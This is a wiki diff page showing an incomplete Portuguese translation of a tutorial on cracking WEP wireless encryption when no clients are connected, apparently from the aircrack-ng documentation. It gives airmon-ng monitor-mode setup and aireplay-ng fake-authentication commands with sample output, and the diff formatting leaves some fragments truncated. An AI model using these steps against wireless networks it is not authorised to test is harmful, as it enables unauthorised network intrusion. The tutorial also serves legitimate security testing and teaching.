pt-br:how_to_crack_wep_with_no_clients
Diferenças
Aqui você vê as diferenças entre duas revisões dessa página.
Próxima revisão | Revisão anterior | ||
pt-br:how_to_crack_wep_with_no_clients [2011/01/08 21:26] – criada rafig | pt-br:how_to_crack_wep_with_no_clients [2011/01/08 22:35] (atual) – rafig | ||
---|---|---|---|
Linha 1: | Linha 1: | ||
+ | . | ||
===== Tutorial: Como craquear WEP sem cliente wireless ===== | ===== Tutorial: Como craquear WEP sem cliente wireless ===== | ||
Linha 99: | Linha 100: | ||
- | // | + | |
| | ||
| | ||
| | ||
- | // | + | |
Você pode notar acima que “ath0” está sendo mostrado que está no modo monitor. \\ | Você pode notar acima que “ath0” está sendo mostrado que está no modo monitor. \\ | ||
Linha 110: | Linha 111: | ||
=== O sistema responderá: | === O sistema responderá: | ||
- | // | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | Bit Rate:0 kb/s Tx-Power:18 dBm | ||
- | | ||
- | | ||
- | Power Management: | ||
- | Link Quality=0/ | ||
- | Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag: | ||
- | Tx excessive retries:0 Invalid misc: | ||
- | \\ | + | |
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | | ||
+ | Bit Rate:0 kb/s | ||
+ | | ||
+ | | ||
+ | Power Management: | ||
+ | Link Quality=0/ | ||
+ | Rx invalid nwid: | ||
+ | Tx excessive retries: | ||
+ | |||
+ | |||
Na resposta acima você pode ver que “ath0” está no modo monitor, com frequência de 2.452GHz | Na resposta acima você pode ver que “ath0” está no modo monitor, com frequência de 2.452GHz | ||
que é o canal 9. O parâmetro “Access Point” mostra o endereço MAC da placa wireless. Somente o | que é o canal 9. O parâmetro “Access Point” mostra o endereço MAC da placa wireless. Somente o | ||
Linha 135: | Linha 140: | ||
=== Dicas de resolução de problemas: === | === Dicas de resolução de problemas: === | ||
* Se uma outra interface for levantada, diferente de ath0 ( ou diferente da interface que você estiver usando) então pare cada uma delas usando “airmon-ng stop athX” onde X é cada é a numeração para cada interface que você quer parar. | * Se uma outra interface for levantada, diferente de ath0 ( ou diferente da interface que você estiver usando) então pare cada uma delas usando “airmon-ng stop athX” onde X é cada é a numeração para cada interface que você quer parar. | ||
- | * Em drivers baseados no drivers mac80211 o sistema irá responder conforme abaixo: \\ // | + | * Em drivers baseados no drivers mac80211 o sistema irá responder conforme abaixo: |
- | Interface | + | |
- | + | ||
- | wlan0 Broadcom | + | Para tal interface, use o nome da interface após “modo monitor habilitado em (aqui mon0)” para demais comando, ao invés de sua interface de rede atual. \\ |
+ | |||
+ | ==== Passo 3 - Usar o aireplay-ng para fazer uma autenticação falsa com o AP ==== | ||
+ | |||
+ | Este é um passo muito importante. \\ | ||
+ | Para fazer um AP aceitar pacotes, o endereço MAC de origem deverá já está associado. Se o endereço MAC de origem | ||
+ | A falta de associação com o AP é a simples e grande razão por que a injeção de pacotes falhou. | ||
+ | Para associar com o AP usando uma autenticação falsa, faça conforma abaixo, digitando na linha de comando de seu console: \\ \\ | ||
+ | // # aireplay-ng -1 0 -e teddy -a 00: | ||
+ | \\ \\ | ||
+ | **Onde:** | ||
+ | *1 -1 quer dizer autenticação falsa; | ||
+ | *2 0 quer dizer reassociação em segundos; | ||
+ | *3 -e teddy é o nome da rede wireless; | ||
+ | *4 -a 00: | ||
+ | *5 -h 00: | ||
+ | *6 ath0 é o nome de nossa interface de rede. | ||
+ | |||
+ | **Uma associação bem sucedida se parecerá conforme abaixo:** \\ \\ | ||
+ | // | ||
+ | 18:18:20 Sending Authentication Request \\ | ||
+ | 18:18:20 Authentication successful \\ | ||
+ | 18:18:20 Sending Association Request \\ | ||
+ | 18:18:20 Association successful :-) \\ | ||
// | // | ||
\\ | \\ | ||
- | Para tal interface, use o nome da interface após “modo monitor habilitado em (aqui mon0)” | + | **Ou uma outra variação: |
+ | |||
+ | //# | ||
+ | \\ \\ | ||
+ | **Onde: ** | ||
+ | - 6000 - Reautentica a cada 6000 secondos. O longo periodo também mantem o pacote ativo para ser enviado; | ||
+ | - -o 1 - Envia somente um conjunto | ||
+ | - -q 10 – Envia pacotes ativos a cada 10 secondos. | ||
+ | |||
+ | **Uma associação bem sucedida se parecerá conforme abaixo: ** \\ \\ | ||
+ | // | ||
+ | 18:22:32 Sending Authentication Request \\ | ||
+ | 18:22:32 Authentication successful \\ | ||
+ | 18:22:32 Sending Association Request \\ | ||
+ | 18:22:32 Association successful :-) \\ | ||
+ | 18:22:42 Sending keep-alive packet \\ | ||
+ | 18:22:52 Sending keep-alive packet \\ | ||
+ | # and so on. \\ | ||
+ | Here is an example of what a failed authentication looks like: \\ | ||
+ | 8:28:02 Sending Authentication Request \\ | ||
+ | 18:28:02 Authentication successful \\ | ||
+ | 18:28:02 Sending Association Request \\ | ||
+ | 18:28:02 Association successful :-) \\ | ||
+ | 18:28:02 Got a deauthentication packet! \\ | ||
+ | 18:28:05 Sending Authentication Request \\ | ||
+ | 18:28:05 Authentication successful \\ | ||
+ | 18:28:05 Sending Association Request \\ | ||
+ | 18:28:10 Sending Authentication Request \\ | ||
+ | 18:28:10 Authentication successful \\ | ||
+ | 18:28:10 Sending Association Request \\ | ||
+ | // | ||
+ | \\ \\ | ||
+ | Note a frase “Got a deauthentication packet” e a continua tentativa acima. No prociga para os proximos passos até você ter uma autenticação falsa corretamente sendo executada. \\ | ||
+ | |||
+ | === Dica de resolução de problemas: === | ||
+ | |||
+ | |||
+ | AINDA EM EDIÇÃO !! | ||
+ | |||
+ | |||
+ | Tabela 1 | ||
+ | | ||
+ | | ||
+ | Frequency | ||
+ | 2.412 GHz 1 2.484 GHz | ||
+ | 2.417 GHz 2 5.180 GHz | ||
+ | 2.422 GHz 3 5.200 GHz | ||
+ | 2.427 GHz 4 5.220 GHz | ||
+ | 2.432 GHz 5 5.240 GHz | ||
+ | 2.437 GHz 6 5.260 GHz | ||
+ | 2.442 GHz 7 5.280 GHz | ||
+ | 2.447 GHz 8 5.300 GHz | ||
+ | 2.452 GHz 9 5.320 GHz | ||
+ | 2.457 GHz 10 5.745 GHz | ||
+ | 2.462 GHz 11 5.765 GHz | ||
+ | 2.467 GHz 12 5.785 GHz | ||
+ | 2.472 GHz 13 5.805 GHz | ||
+ | |
pt-br/how_to_crack_wep_with_no_clients.1294518376.txt.gz · Última modificação: 2011/01/08 21:26 por rafig